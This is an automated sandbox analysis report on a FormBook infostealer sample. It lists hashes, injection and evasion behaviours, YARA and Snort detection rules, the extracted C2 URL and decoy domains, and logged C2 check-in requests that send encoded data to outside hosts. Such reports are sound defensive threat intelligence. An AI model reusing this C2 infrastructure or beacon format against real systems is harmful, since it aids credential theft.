Analysis Report lpdKSOB78u.exe

Overview

General Information

Sample Name: lpdKSOB78u.exe
Analysis ID: 356515
MD5: f10054d325df455c58ecb16ea660d3f2
SHA1: 54871af48b64576922b97965efeeea94976bc119
SHA256: b060cb81afd9113cfbbb1e346c99e503c545da47ed80096c021b7ca41c064c76
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • lpdKSOB78u.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\lpdKSOB78u.exe' MD5: F10054D325DF455C58ECB16EA660D3F2)
    • lpdKSOB78u.exe (PID: 5652 cmdline: 'C:\Users\user\Desktop\lpdKSOB78u.exe' MD5: F10054D325DF455C58ECB16EA660D3F2)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6748 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6956 cmdline: /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.torontotel.com/4qdc/"], "decoy": ["mangpe.asia", "mmstruckingllc.com", "ascendingworship.com", "gfeets.com", "smartcbda.com", "dreaminggrand.com", "dohostar.com", "farkindalik365.com", "weareexpatwomen.com", "gamereruns.com", "rosesandframes.com", "commagx4.info", "tarpleymusic.info", "szttskj.com", "calatheahomeservices.com", "qm7886.com", "emunmous.com", "deutschclub.com", "39palmavenue.com", "thepixxelgroup.com", "buildassetswealth.com", "oscarandmarina.com", "zingoworks.space", "edgewooddhr.net", "earth-emily.com", "belanjagratis.com", "sandrapidal.com", "btvstudios.com", "aberdareroyalcottages.com", "officialgiftclub.com", "kerdbooks.com", "havemercyinc.net", "sunsitek.com", "larek.store", "radioapostolicadigital.com", "xcuswaeheje.com", "ndk168.com", "pcareinc.com", "beconfidentagain.com", "codejunkys.com", "constancescot.com", "inbarrel.com", "thepurepharmacy.com", "finoblog.com", "orderbbqculinary.com", "bgshtswp.com", "hezhengnet.com", "clerolaustrie.com", "speedysnacksbox.com", "amazonia.coffee", "mnkmultiservicios.com", "antips.com", "powerofphoto.com", "trackyourvote.com", "equiposddl.com", "mintmobikeplus.com", "grn-shop.com", "fabslab.coffee", "musicindustrymag.com", "cyprusdivingcenters.com", "sunsilify.com", "rehabcareconnect.com", "kingscarehospital.com", "pompomlearning.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.lpdKSOB78u.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.lpdKSOB78u.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.lpdKSOB78u.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0.2.lpdKSOB78u.exe.2a30000.5.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.lpdKSOB78u.exe.2a30000.5.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll, ReversingLabs: Detection: 21%
Multi AV Scanner detection for submitted file
Source: lpdKSOB78u.exe, Virustotal: Detection: 44%
Source: lpdKSOB78u.exe, ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match, File source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: lpdKSOB78u.exe, Joe Sandbox ML: detected
Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: lpdKSOB78u.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: lpdKSOB78u.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: lpdKSOB78u.exe, 00000000.00000003.205218390.0000000002BF0000.00000004.00000001.sdmp, lpdKSOB78u.exe, 00000001.00000002.266056817.0000000000A8F000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: lpdKSOB78u.exe, raserver.exe
Source: Binary string: RAServer.pdb source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
Source: Binary string: RAServer.pdbGCTL source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\lpdKSOB78u.exe, Code function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A15
Source: C:\Users\user\Desktop\lpdKSOB78u.exe, Code function: 0_2_004065C1 FindFirstFileA,FindClose,0_2_004065C1
Source: C:\Users\user\Desktop\lpdKSOB78u.exe, Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 23.224.206.45:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 23.224.206.45:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 23.224.206.45:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 104.21.76.239:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 104.21.76.239:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 104.21.76.239:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49753 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49753 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49753 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.torontotel.com/4qdc/
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=n05rnph+IqNz0mbSS5vp9sGjLY7dyqnysY607r4vHHjCLr3ziiRBE07QjlPjM5GqarqD&2dz=onbha HTTP/1.1 | Host: www.pcareinc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=FDPsk0sff5Lw+z8Vw8rcgpm8MWqJfMs2bvH8+cW5/POI2TSyhlXdRmW8g+C2mzqgUbJY&2dz=onbha HTTP/1.1 | Host: www.antips.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=+7VgHCQQJYO0FHfoX4VwpMGRpMkf/fkwbCKrV3wMZoe5nkwvpaAzoW+aSblNd7Hd+wjC&2dz=onbha HTTP/1.1 | Host: www.edgewooddhr.net | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=fgRLe1wDsIR582SpVqHNrqc5X9FQKzC9eNMuu75MPd7YekjVZ2QEORs18XDbgwZ5UcjJ&2dz=onbha HTTP/1.1 | Host: www.ndk168.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=DRpehdA/33BzcPgqXFJLC0P+7mKy3AC9kGgryjypn4W4a4lypWUQvIUJQnrelubfkLFp&2dz=onbha HTTP/1.1 | Host: www.inbarrel.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=ZB8Pl5eBC7Hephg+P6iGhrGYsApNwIB7ekAHWQJEYqlC8jRN6CLcZFL5CLWpIktyGytq&2dz=onbha HTTP/1.1 | Host: www.39palmavenue.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=t6rgzpThEavL/zg9991GCjSWOfv9/TODS4c0mNe7yolhiaEFU/O6K33zqhrleftTdvyE&2dz=onbha HTTP/1.1 | Host: www.buildassetswealth.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=uT9syTVFNHzfIlw/vi0ORJwgGNlm67yR3EiChoWxlToAUfSEqT6/a/KF0zmtzwOHQ1u8&2dz=onbha HTTP/1.1 | Host: www.beconfidentagain.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=XrM9oEi9W6a6X8UVQlR+JUyFbINbZfC+p7wdaOxjToB4fXjiFd7gjA62KvYw0vzt+GJp&2dz=onbha HTTP/1.1 | Host: www.rehabcareconnect.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=oetlJbthpq9VCk3sxGtc819EDOSw/wKhNDSOaTnbk4bTW9QfHQR4t80kWNVKaJln9Y1c&2dz=onbha HTTP/1.1 | Host: www.speedysnacksbox.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha HTTP/1.1 | Host: www.havemercyinc.net | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View, IP Address: 208.91.197.27
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: unknown, DNS traffic detected: queries for: www.pcareinc.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | Content-Type: text/html | Last-Modified: Tue, 09 Jul 2019 06:18:14 GMT | Etag: "999-5d2431a6-2d9d76b743ab0996;;;" | Accept-Ranges: bytes | Content-Length: 2457 | Date: Tue, 23 Feb 2021 08:20:07 GMT | Server: LiteSpeed
          Source: explorer.exe, 00000004.00000000.237000933.000000000F540000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Left.png)
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Right.png)
          Source: lpdKSOB78u.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: lpdKSOB78u.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://rdfs.org/sioc/ns#
          Source: raserver.exe, 00000009.00000002.476650462.0000000005152000.00000004.00000001.sdmpString found in binary or memory: http://rdfs.org/sioc/types#
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.233837261.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Code function: 0_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004054B2

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004181B0 NtCreateFile,1_2_004181B0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00418260 NtReadFile,1_2_00418260
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004182E0 NtClose,1_2_004182E0
